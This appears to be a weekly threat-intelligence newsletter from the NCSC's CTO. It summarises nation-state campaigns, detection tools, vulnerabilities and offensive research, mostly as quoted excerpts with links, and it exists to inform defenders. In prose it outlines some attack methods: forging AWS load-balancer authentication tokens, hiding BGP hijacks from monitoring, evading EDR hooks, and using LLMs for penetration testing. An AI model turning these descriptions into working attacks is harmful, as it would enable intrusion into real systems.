CTO at NCSC Summary: week ending August 25th

Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.

Operationally this week nothing overly of note..

In the high-level this week:

Chevening India Cyber Security Fellowship – Chevening Awards announces – applications are open until October 10th – “The Chevening India Cyber Security Fellowship is aimed at mid-career professionals with demonstrable leadership potential in the field of cyber security or cyber policy in India. The fellowship is funded by the UK Foreign, Commonwealth, and Development Office.”
Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts – FBI and co state – “We have observed increasingly aggressive Iranian activity during this election cycle, specifically involving influence operations targeting the American public and cyber operations targeting presidential campaigns.”
Singapore’s Operational Technology Cybersecurity Masterplan 2024 – Singapore Cyber Security Agency publishes – ”the Masterplan 2024 also outlines updates in the areas of People, Processes, and Technology to uplift cybersecurity postures as part of our continuous efforts to enhance the cybersecurity of sectors operating OT systems and technologies:
1. Enhance the OT Cybersecurity Talent Pipeline
2. Enhance Information Sharing and Reporting
3. Uplift OT Cybersecurity Resilience beyond CII
4. Establish an OT Cybersecurity Centre of Excellence and promote Secure-By-Deployment throughout the lifecycle of the OT systems”
A separate registry could be created for white hat hackers – Vedomosti reports from Russia – “The Federation Council, FSB, Ministry of Internal Affairs and information security (IS) companies are discussing the possibility of creating a register of white hackers and their certification. Vedomosti was told about this by three sources close to various information security companies. According to them, the issue was discussed at a closed meeting of department representatives in early August.”
Ukrainian hackers show war footage on Russian TV, source says – The Kyiv Independent news desk reports – “Hackers of Ukraine’s military intelligence agency (HUR) broke into servers of several Russian television channels and broadcasted “objective videos about the war in Ukraine,” a source in the agency told the Kyiv Independent on Aug. 22. According to the source, HUR’s footage was displayed three times on prime-time TV channels: Pervouralsk TV, Eurasia 360, Eurasia Pervyi Kanal, and others. The targeted channels further reportedly included Lugansk 24, Pervyi Respublikanskyi, SpB, Oplot, TV-3, and Pervyi Rosiyskyi. Some of the targeted channels belong to Russian oligarch Andrey Komarov.”
Bureaucratic initiative redefines German law enforcement cyber operations – Binding Hook asserts – “Even though technically feasible, the federal legal framework provides no basis to clean up victim systems (such as the Emotet quarantining), a measure that would be considered an emergency response (Gefahrenabwehr, in German). Constitutionally, police action to avert danger is the remit of state police. The BKA, by contrast, is tasked with criminal prosecution. Under this distribution of power, operations that remove malware without prosecution objectives lack a clear legal framework. As the BKA’s actions in the Emotet case show, currently, the deactivation of malware is only possible in combination with efforts to secure evidence and is, legally, considered a side effect.”
FAA Equipment, Systems, and Network Information Security Protection – Federal Aviation Authority notifies – “This proposed rulemaking would impose new design standards to address cybersecurity threats for transport category airplanes, engines, and propellers. The intended effect of this proposed action is to standardize the FAA’s criteria for addressing cybersecurity threats, reducing certification costs and time while maintaining the same level of safety provided by current special conditions”
North Korean IT developers also develop domestic apps?… “Risk of abuse as a hacking tool” – Korean Broadcasting System reports – “The number of North Korean IT workers revealed by the National Intelligence Service is in the thousands worldwide,” – how is that insider threat programme?
(US) Army Cyber Command Foundry program provides data-centric military intelligence training – US Army announces – “ARCYBER G2 officials explained that they developed the training program to provide streamlined and comprehensive training material on the technical aspects of cyber-based knowledge. The courses extract the requisite technical elements of commercial and military courses and blend them with intelligence practices and tradecraft instrumental to wide-ranging cyber-related missions in support of U.S. Cyber Command priorities.”
Reporting on/from China
Artificial intelligence
- A benchmark for evaluating the cybersecurity capabilities and risks of language models – Stanford University publishes – “Cybench includes 40 professional-level Capture the Flag (CTF) tasks from 4 distinct CTF competitions, chosen to be recent, meaningful, and spanning a wide range of difficulties. We add subtasks, which break down a task into intermediary steps for more gradated evaluation, to 17 of the 40 tasks.”
- The Global Race to Control A.I. – New York Times reports – “A.I. nationalism is part of a wider fracturing of the internet, where services vary based on local laws and national interests. What’s left is a new kind of tech world where the effects of A.I. in your life may just depend on where you live.”
- Schumer Optimistic About Passing Federal AI Regulation This Year – Wall Street Journal reports – “We’re going to get a great AI package which keeps innovation as our North Star, hopefully through the Congress by the end of the year. We have great prospects,” said Senate Majority Leader Chuck Schumer (D., N.Y.).
- California AI Regulation Bill Advances to Assembly Vote with Key Amendments – Campus Technology reports – “California’s “Safe and Secure Innovation for Frontier Artificial Intelligence Models Act” (Senate Bill 1047), spearheaded by Senator Scott Wiener (D-San Francisco), has cleared the Assembly Appropriations Committee with some significant amendments. The bill, aimed at establishing rigorous safety standards for large-scale artificial intelligence (AI) systems, is set for a vote on the Assembly floor on Aug. 20 and must pass by Aug. 31 to move forward”
- South Africa National AI Policy Framework – South Africa government publishes – “The National Artificial Intelligence (AI) Policy Framework for South Africa (a first step in developing the National AI Policy) aims to promote the integration of Artificial Intelligence technologies to drive economic growth, enhance societal well-being, and position South Africa as a leader in AI innovation.”
Cyber proliferation
- A Global Treaty to Fight Cybercrime—Without Combating Mercenary Spyware – Lawfare asserts – “The inability of the international community to generate consensus on matters concerning fundamental human rights leaves UN member states with the choice of whether to sign the treaty without key human rights safeguards. However, if history is a teacher, it tells that mandating cross-border cooperation without mandating robust human rights commitments is not a tenable path forward in the fight against transnational cybercrime.”
Bounty Hunting
- Pulaski County Man Sentenced for Cyber Intrusion and Aggravated Identity Theft – US Department of Justice reports – “The Defendant committed cyber intrusions, by hacking into state death registry systems to fake his own death to avoid paying his child support obligations. He also hacked into private businesses and attempted to sell access to networks on the dark web”
- Member of Russian cybercrime group charged in Ohio – US Department of Justice reports – “According to court documents, Zolotarjovs is a member of a known cybercriminal organization that attacks computer systems of victims around the world. Among other things, the Russian cybercrime group steals victim data and threatens to release it unless the victim pays ransom in cryptocurrency. The group maintains a leaks and auction website that lists victim companies and offers stolen data for download.”
CrowdStrike hits out at rivals’ ‘shady’ attacks after global IT outage – Financial Times reports – “the CrowdStrike executive said no vendor could “technically” guarantee that their own software would never cause a similar incident.” – might be true for vendors, but formal verification/methods might be a way..
InsurSec Can Drive An Effective Proactive Cybersecurity Strategy Says New Analyst Report – Omida and At-bay assert “Cyber insurance requirements are a major factor in how organizations make security-buying decisions. 43% of all respondents report that cyber insurance requirements are a “major or leading driver” of cybersecurity spend. The percentage is even higher among the largest organizations, among which 52% report that cyber insurance requirements are a major driver of spending” – Report

Reflections this week come from the quality of applied cyber security research occurring in academia as shown by the papers at USENIX Security ’24 Summer. The breadth is impressive and on multiple fronts. From the quality of vulnerability research on show, with clearly a number of European Universities building impressive departments, through to the socio-technical aspects. Pull through of this and other research is where the value will be realised, but it doesn’t appear that there are the rapid pull-through from commercial partnerships exist on the level they should.

Think someone else would benefit? Share:

All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.

Have a lovely Friday..

Ollie

Who is doing what to whom and how allegedly.

Ukrainian government details this campaign where the distribution mechanism is not mentioned. The notable element is the deployment of new capability.

The mentioned archive contains a CHM file “list of vp dropped out. kursk.chm”, which, among other things, contains an HTML file “part.html” containing JavaScript code, which in turn ensures the launch of an obfuscated PowerShell – script.

The PowerShell code is designed to download components of the SPECTR malicious program (it steals documents, screenshots, Internet browser data, etc.) and the new FIRMACHAGENT program (“chrome_updater.dll”; the main task of which is to download stolen data to the management server) ,

https://cert.gov.ua/article/6280422

Malpedia alleges the Russian link:

Vermin is a threat actor group linked to the Luhansk People’s Republic and believed to be acting on behalf of the Kremlin. They have targeted Ukrainian government infrastructure using malware like Spectr and legitimate tools like SyncThing for data exfiltration. Vermin has been active since at least 2018, using custom-made RATs like Vermin and open-source tools like Quasar for cyber-espionage. The group has resurfaced after periods of inactivity to conduct espionage operations against Ukraine’s military and defense sectors.

https://malpedia.caad.fkie.fraunhofer.de/actor/uac-0020

Nothing this week

Christopher Lopez details this alleged North Korean campaign which is signed by a Hongkong firm Leap World Hongkong Limited.

A signed file named TodoTasks was uploaded to VirusTotal on 2024-07-24. This application shares several behaviors with malware we’ve seen that originated in North Korea (DPRK)—specifically the threat actor known as BlueNoroff—such as KandyKorn and RustBucket; given these commonalities, we believe this new malware—which we’re dubbing TodoSwift—is likely from the same source.

https://www.kandji.io/blog/todoswift-disguises-malware-download-behind-bitcoin-pdf

Asheer Malhotra, Guilherme Venere and Vitor Ventura detail this alleged North Korean campaign which apparently shows signs of development discipline in terms of test driven development.

Cisco Talos is exposing infrastructure we assess with high confidence is being used by a state-sponsored North Korean nexus of threat actors we track as “UAT-5394,” including for staging, command and control (C2) servers, and test machines the threat actors use to test their implants.

Our analysis of the threat actor’s infrastructure indicates they pivoted across C2s and staging servers to set up new infrastructure and modify existing servers.

This campaign consists of distributing a variant of the open-source XenoRAT malware we’re calling “MoonPeak,” a remote access trojan (RAT) being actively developed by the threat actor.

Analysis of XenoRAT against MoonPeak malware samples we’ve discovered so far illustrates the evolution of the malware family after it was forked by the threat actors.

https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/

Emma Brownstein alleges that North Korea were exploiting a zero-day known as CVE-2024-38193.

(We) discovered that the Lazarus group was exploiting a hidden security flaw in a crucial part of Windows called the AFD.sys driver. We also discovered that they used a special type of malware called Fudmodule to hide their activities from security software.

https://www.gendigital.com/blog/news/innovation/protecting-windows-users

this malware was also covered in February 2024 exploiting a different zero-day CVE-2024-21338 at the time in appid.sys. If reporting is accurate it shows they have at least one competent Windows driver vulnerability researcher and/or source of them.

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day

Joshua Miller, Georgi Mladenov, Andrew Northern, Greg Lesnewich and team detail this alleged Iranian campaign with notable victimology. That and the use of social engineering..

Proofpoint identified Iranian threat actor TA453 targeting a prominent religious figure with a fake podcast interview invitation.

The initial interaction attempted to lure the target to engage with a benign email to build conversation and trust to then subsequently click on a follow-up malicious link.

The attack chain attempted to deliver a new malware toolkit called BlackSmith, which delivered a PowerShell trojan dubbed AnvilEcho by Proofpoint.

The malware, which uses encryption and network communication techniques similar to previously observed TA453 samples, is designed to enable intelligence gathering and exfiltration.

AnvilEcho contains all of TA453’s previously identified malware capabilities in a single PowerShell script rather than the modular approach previously observed.

https://www.proofpoint.com/us/blog/threat-insight/best-laid-plans-ta453-targets-religious-figure-fake-podcast-invite-delivering

Insikt Group report on this alleged Iranian phishing related infrastructure.

From May 2024 onward, GreenCharlie registered a large number of dynamic DNS (DDNS) domains that have highly likely been used for targeted social engineering and phishing operations.

Insikt Group has established a direct infrastructure link between GreenCharlie clusters and malware referred to in open sources as GORBLE, which is reportedly linked to the targeting of US political candidates.

Analysis of Recorded Future Network Intelligence indicates that GreenCharlie threat actors likely used ProtonVPN or ProtonMail to enable their operations.

Iranian IP addresses were identified communicating with GreenCharlie infrastructure, which is likely part of the operation’s spearphishing component.

GreenCharlie’s victimology includes research and policy analysts, government officials, diplomats, and high-value strategic targets. While Insikt Group has not identified direct evidence of the targeting of US government and political campaign officials, open-source reporting has enabled us to establish a credible link.

GreenCharlie highly likely operates at the behest of the Islamic Revolutionary Guard Corps (IRGC); due to its persistent and strategic remit, it is also likely to be associated with the Intelligence Organization of the IRGC (IRGC-IO).

https://go.recordedfuture.com/hubfs/reports/cta-ir-2024-0820.pdf

Will does what he does best in this release.

This repository contains a list of which tools each ransomware gang or extortionist gang uses

As defenders, we should exploit the fact that many of the tools used by these cybercriminals are often reused

We can threat hunt, deploy detections, and block these tools to eliminate the ability of adversaries to launch intrusions

This project will be updated as additional intelligence on ransomware gang TTPs is made available

https://github.com/BushidoUK/Ransomware-Tool-Matrix

https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html

Russian Panada evidences how legitimate code signed software is being integrated into malicious campaigns to avoid being detected / flagged as being malicious.

Some of the Dolphin Loader payloads currently have zero detections on VirusTotal. Why? Because it uses legitimate, EV-signed remote management software to deliver the final payload. This approach is very convenient for the loader’s developer because it eliminates the need to obtain an EV certificate and end up paying a significant amount of money out-of-pocket. Leveraging legitimate RMM software to deliver malware also offers numerous advantages:

Since RMM tools are meant to run quietly in the background because they monitor and manage systems, malware leveraging these tools can operate stealthily, avoiding detection by users.

RMM tools already include features for remote command or script execution, system monitoring, and data exfiltration. Attackers can use these built-in functionalities to control compromised systems.

Organizations trust their RMM solutions for IT operations. This trust can be exploited by attackers to deliver malware without raising immediate suspicion from users or IT staff.

https://russianpanda.com/The-Abuse-of-ITarian-RMM-by-Dolphin-Loader

Unit42 detail a campaign where the scale of scanning is the thing of note in this reporting, that and a trivially exploitable issue which can have devasting consequences,

Unit 42 researchers found an extortion campaign’s cloud operation that successfully compromised and extorted multiple victim organizations. It did so by leveraging exposed environment variable files (.env files) that contained sensitive variables such as credentials belonging to various applications.

Multiple security missteps were present in the course of this campaign, including the following:

Exposing environment variables

Using long-lived credentials

Absence of least privilege architecture

The campaign operation set up its attack infrastructure within various organizations’ Amazon Web Services (AWS) environments and used that groundwork to scan more than 230 million unique targets for sensitive information.

https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/

Symantec detail this unattributed but interesting campaign which solely uses DNS for command and control. Also interesting that a recent web server vulnerability is apparently being used for initial access.

A previously unseen backdoor (Backdoor.Msupedge) utilizing an infrequently seen technique was deployed in an attack against a university in Taiwan.

The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic. While the technique is known and has been used by multiple threat actors, it is nevertheless something that is not often seen.

..

The initial intrusion was likely through the exploit of a recently patched PHP vulnerability (CVE-2024-4577). The vulnerability is a CGI argument injection flaw affecting all versions of PHP installed on the Windows operating system. Successful exploitation of the vulnerability can lead to remote code execution.

https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns

How we find and understand the latent compromises within our environments.

and Get-WindowsUpdateLog in PowerShell – to support detection of Windows Downdate (see below).

https://learn.microsoft.com/en-us/windows/deployment/update/windows-update-logs

Michael Haag releases a new capability to detect webshells – go forth and discover latent compromises!

ShellSweepX is an advanced, ML-powered web shell detection and analysis platform designed to enhance your organization’s cybersecurity posture. By leveraging machine learning algorithms and YARA rules, ShellSweepX provides robust protection against web-based threats, particularly focusing on the identification and analysis of potential web shells.

https://github.com/splunk/ShellSweep/wiki/ShellSweepX

AbdulRhman Alfaifi shows the value of keeping track of feature evolution of forensic opportunity.

On Windows 11, Notepad stores a cache of recently opened files. This cache contains valuable information, such as file paths, file contents, and other useful data. In this article, we will examine the structure of the Notepad cache and provide a custom parser to extract this information for forensic investigations.

https://u0041.co/posts/articals/exploring-windows-artifacts-notepad-files/

How we proactively defend our environments.

ASD + 5EYES + friends co-seal these best practices.. go forth and log!

This publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) in cooperation with the following international partners:

United States (US) Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA)

United Kingdom (UK) National Cyber Security Centre (NCSC-UK)

Canadian Centre for Cyber Security (CCCS) • New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team (CERT NZ)

Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and Computer Emergency Response Team Coordination Center (JPCERT/CC)

The Republic of Korea National Intelligence Services (NIS) and NIS’s National Cyber Security Center (NCSC-Korea)

Singapore Cyber Security Agency (CSA) • The Netherlands General Intelligence and Security Service (AIVD) and Military Intelligence and Security Service (MIVD).

..

There are four key factors to consider when pursuing logging best practices:

enterprise-approved event logging policy

centralised event log access and correlation

secure storage and event log integrity

detection strategy for relevant threats.

https://media.defense.gov/2024/Aug/21/2003530453/-1/-1/0/JOINT-CSI-BEST-PRACTICES-EVENT-LOGGING-THREAT-DETECTION.PDF

Jonathan Walker provides an interesting analysis..

https://www.securityrunners.io/post/exposing-security-observability-gaps-in-aws

Daniel Shechter details a clearly common configuration that organisations should ensure they are not affected by due to the potential for authentication implications.

First, the attacker creates their own ALB instance with authentication configured in their account. The attacker then uses this ALB to sign a token they fully control. Next, the attacker alters the ALB configuration and sets the issuer field to the victim’s expected issuer. AWS subsequently signs the attacker’s forged token with the victim’s issuer. Finally, the attacker uses this minted token against the victim’s application, bypassing both authentication and authorization.

..

‍On July 19th, 2024, AWS updated the authentication feature documentation to clarify best practices for Security Groups:“Also, as a security best practice we recommend you restrict your targets to only receive traffic from your Application Load Balancer. You can achieve this by configuring your targets’ security group to reference the load balancer’s security group ID.”

..

AWS does not consider issuer forging an ALB vulnerability and has stated that the service operates as intended. They highlighted the shared responsibility model, suggesting that customers should ensure their code and configurations are up-to-date to mitigate this issue.

..

(We identified over 15,000 (out of 371,000*) potentially vulnerable ALBs and applications using AWS ALB’s authentication feature. We’ve done our best to contact each affected organization with our findings and provide support where needed.

https://www.miggo.io/resources/albeast-security-advisory-alb-vulnerability

Alex Bocharov and Adam Martinetti show an evolution in JA4 application which is fascinating..

JA4 Signals are inter-request features computed based on the last hour of all traffic that Cloudflare sees globally. On a daily basis, we analyze over 15 million unique JA4 fingerprints generated from more than 500 million user agents and billions of IP addresses. This breadth of data enables JA4 Signals to provide aggregated statistics that offer deeper insights into global traffic patterns – far beyond what single-request or connection fingerprinting can achieve. These signals are crucial for enhancing security measures, whether through simple firewall rules, Workers scripts, or advanced machine learning models.

https://blog.cloudflare.com/ja4-signals

How they got in and what they did.

Nothing this week

Our attack surface.

Vendor advisory.

An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015

Henry Birge-Lee, Maria Apostolaki and Jennifer Rexford detail a twist which may cause some detection headaches..

As the deployment of comprehensive Border Gateway Protocol (BGP) security measures is still in progress, BGP monitoring continues to play a critical role in protecting the Internet from routing attacks. Fundamentally, monitoring involves observing BGP feeds to detect suspicious announcements and taking defensive action. However, BGP monitoring relies on seeing the malicious BGP announcement in the first place! In this paper, we develop a novel attack that can hide itself from all state-of-the-art BGP monitoring systems we tested while affecting the entire Internet. The attack involves launching a sub-prefix hijack with the RFC-specified NO_EXPORT community attached to prevent networks with the malicious route installed from sending the route to BGP monitoring systems. We study the viability of this attack at four tier-1 networks and find all networks we studied were vulnerable to the attack. Finally, we propose a mitigation that significantly improves the robustness of the BGP monitoring ecosystem

https://arxiv.org/pdf/2408.09622

Interesting vulnerability where \n can cause real pain. Don’t have a Kubernetes pod get compromised or it could get really painful.

The vulnerability stems from a flaw in the way ingress-nginx validates annotations on Ingress objects. Annotations in Kubernetes are used to attach arbitrary non-identifying metadata to objects. In the case of ingress-nginx, annotations are used to configure various behaviors of the ingress controller.

The vulnerability allows an attacker to inject malicious content into certain annotations, bypassing the intended validation checks. This can lead to arbitrary command injection and potential access to the ingress-nginx controller’s credentials, which, in default configurations, has access to all secrets in the cluster.

..

The attacker creates an Ingress object with a specially crafted annotation that includes a carriage returns (\r) character to bypass validation. his allows the injection of unauthorized content and potential XSS attacks. For example:

https://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass/

Philippe Teuwen details a long time latent issue..

MIFARE Classic smart cards, developed and licensed by NXP, are widely used but have been subjected to numerous attacks over the years. Despite the introduction of new versions, these cards have remained vulnerable, even in card-only scenarios. In 2020, the FM11RF08S, a new variant of MIFARE Classic, was released by the leading Chinese manufacturer of unlicensed “MIFARE compatible” chips. This variant features specific countermeasures designed to thwart all known card-only attacks and is gradually gaining market share worldwide. In this paper, we present several attacks and unexpected findings regarding the FM11RF08S. Through empirical research, we discovered a hardware backdoor and successfully cracked its key. This backdoor enables any entity with knowledge of it to compromise all user-defined keys on these cards without prior knowledge, simply by accessing the card for a few minutes. Additionally, our investigation into older cards uncovered another hardware backdoor key that was common to several manufacturers.

https://eprint.iacr.org/2024/1275.pdf

A Chinese analysis of various small satellites and their vulnerability.

https://mp-weixin-qq-com.translate.goog/s/wgBFJm5lCwrIcGXfXUy3TQ?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp

Attack capability, techniques and trade-craft.

Alon Leviev releases a tool which we can expect adversarial use in 3..2..

A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities

https://github.com/SafeBreach-Labs/WindowsDowndate

From China..

Internal of Malice (Evil Network) strives to implement a post-exploit infrastructure that is compatible with CS, MSF, and Sliver ecosystems, while providing higher scalability and concealment, and a set of engineering solutions.

C2 is more challenging than other areas, both in design and implementation.

What we want to try to design is the next generation of C2, a C2 framework that is more advanced in terms of interactive experience, scalability, port confrontation, traffic confrontation, etc.

Currently, v0.0.1 is still a long way from the complete form of the design goal. However, due to the development progress, we decided to accept the opinions from the community first. We cannot create the most advanced tools in isolation.

https://chainreactors.github.io/wiki/IoM/

A overview article has been published:

Summarizes some core design concepts of the next generation C2.

Rust is the ideal language for the next generation of C2, providing low-level operation capabilities, cross-platform compilation, and the ability to modify almost all features.

Modular, hot-swappable, and highly customizable implant design. We break down all functions into building blocks, and use the features and conditional compilation provided by Rust to achieve any combination.

Support webshell, and open up the underlying operation capabilities, reuse C2’s plug-in ecosystem, such as the assembly-execute capability of the CLR ecosystem, Java’s JNI and JVMTI, etc.

OPSEC first, and open OPSEC custom interfaces as much as possible

Highly controllable flow rate

From C2 to bootkit/rootkit

Listeners and servers should be decoupled, and the next generation of C2 should be distributed by nature

Compatibility with existing C2 ecosystems, such as CobaltStrike’s BOF, Silver’s Armory, etc.

……

https://mp-weixin-qq-com.translate.goog/s/qaO2pC_BlL4tKlbZlYh4CQ?_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp

Jakub Osmani details an interesting and rather novel mobile offensive technique here. Now it has been reported we should expect an uptick..

Standard phishing delivery techniques were combined with a novel method of phishing; targeting Android and iOS users via PWAs, and on Android also WebAPKs.

Insidiously, installing a PWA/WebAPK application does not warn the victim about installing a third-party application.

On Android, these phishing WebAPKs even appear to have been installed from the Google Play store.

Most of the observed applications targeted clients of Czech banks, but we also observed one phishing app that targeted a Hungarian bank and another targeting a Georgian bank.

Based on the C&C servers utilized and backend infrastructure, we conclude that two different threat actors were operating the campaigns.

Thanks to our discovery of operator panels on different domains, we were able to notify the victims’ banks in order to protect them.

https://www.welivesecurity.com/en/eset-research/be-careful-what-you-pwish-for-phishing-in-pwa-applications/

Qisheng Jiang and Chundong Wang show the subtly of what is possible..

We accordingly build a covert channel named Sync+Sync. Sync+Sync delivers a transmission bandwidth of 20,000 bits per second at an error rate of about 0.40% with an ordinary solid-state drive. Sync+Sync can be conducted in cross-disk partition, cross-file system, cross-container, cross-virtual machine, and even cross-disk drive fashions, without sharing data between programs. Next, we launch side-channel attacks with Sync+Sync and manage to precisely detect operations of a victim database (e.g., insert/update and B-Tree node split).

https://www.usenix.org/system/files/sec23winter-prepub-554-jiang.pdf

Helvio Junior highlights a gap in EDRs which will be interesting to see how quickly it is addressed.

Through a precise combination of IAT Hooking techniques, dynamic SSN resolution, and indirect system calls, HookChain redirects the execution flow of Windows subsystems in a way that remains invisible to the vigilant eyes of EDRs that only act on Ntdll.dll, without requiring changes to the source code of the applications and malwares involved.

https://github.com/helviojunior/hookchain/

What is being exploited.

Shwetanjali Rasal details the vulnerability exploited by this ransomware actor..

Brontoo Technology Solutions filed a report with CertIn (Indian Computer Emergency Response Team) which revealed that the attack originated from a misconfigured Jenkins server, setting off the chain of events. On further analysis, the threat actor leveraged CVE-2024-23897 to gain initial unauthorized access to the victim’s environment.

The Hidden Door: How CVE-2024-23897 Enabled Ransomware Attack on Indian Banks

Andy Giron, Frederic Baguelin, Eslam Salem and Matt Mills highlights the risk from zombie vulnerabilities… the long tail of vulnerability even for high-profile vulnerabilities is indeed long.

Despite being over two years old, the Log4j vulnerability (Log4Shell) remains a persistent and evolving threat, as demonstrated by a recent opportunistic campaign leveraging it for crypto-mining and system compromise.

The attack uses obfuscated LDAP requests to evade detection, leading to the execution of malicious scripts on compromised systems.

The script establishes persistence, performs system reconnaissance, and exfiltrates data, maintaining control through multiple backdoors and encrypted communication channels.

https://securitylabs.datadoghq.com/articles/the-gift-that-keeps-on-giving-a-new-opportunistic-log4j-campaign/

Low level tooling and techniques for attack and defence researchers…

Emre Güler , Sergej Schumilo , Moritz Schloegel , Nils Bars , Philipp Görz , Xinyi Xu , Cemal Kaygusuz , and Thorsten Holz show that tailored fuzzers can bring performance gains..

In this paper, we present ATROPOS, a snapshot-based, feedback-driven fuzzing method tailored for PHP-based web applications. Our approach considers the challenges associated with web applications, such as maintaining session state and generating highly structured inputs. Moreover, we propose a feedback mechanism to automatically infer the key-value structure used by web applications. Combined with eight new bug oracles, each covering a common class of vulnerabilities in server-side web applications, ATROPOS is the first approach to fuzz web applications effectively and efficiently. Our evaluation shows that ATROPOS significantly outperforms the current state of the art in web application testing. In particular, it finds, on average, at least 32% more bugs, while not reporting a single false positive on different test suites. When analyzing real-world web applications, we identify seven previously unknown vulnerabilities that can be exploited even by unauthenticated users.

https://www.usenix.org/system/files/sec23winter-prepub-167-guler.pdf

Robin Kirchner , Jonas Möller , Marius Musch , David Klein , Konrad Rieck and Martin Johns show niche bugs/techniques applied to a large enough population will get you something.

Based on these polyglots, we conduct a study of BXSS vulnerabilities on the Tranco Top 100,000 websites. We discover 20 vulnerabilities in 18 web-based backend systems. These findings demonstrate the efficacy of our detection approach and point at a largely unexplored attack surface in web security

https://www.usenix.org/system/files/sec23winter-prepub-226-kirchner-rev.pdf

An AI-Driven Pentesting Solution from China

It has been verified that the application of LLM in penetration testing is feasible. The following four points have a decisive influence on the final effect:

For the selection of large models, it is sufficient as long as the parameters are large. There is no need to pay too much attention to whether the model has been fine-tuned for a specific field. The knowledge of a specific field can be solved by using rag.

RAG is equivalent to an external knowledge base that is independent of LLM. As long as the private knowledge base is complete enough, its “experience” will be rich enough.

Prompt words simulate various roles through prompt words, such as hacker, security researcher, security engineer, etc., so that LLM can better understand our needs.

The richer the external tool arsenal, the better

https://github.com/hangxin1940/bladerazor

Rolf Rolles provides a source of SRE insight..

this blog entry is about a different kind of C++ exception metadata: namely, wind and unwind. In the remainder of this blog entry, we introduce wind and unwind metadata — what it is, and when and why the compiler inserts it — before describing how to exploit it when reverse engineering C++ programs.

https://www.msreverseengineering.com/blog/2024/8/20/c-unwind-metadata-1

Some other small (and not so small) bits and bobs which might be of interest.

Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.

This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.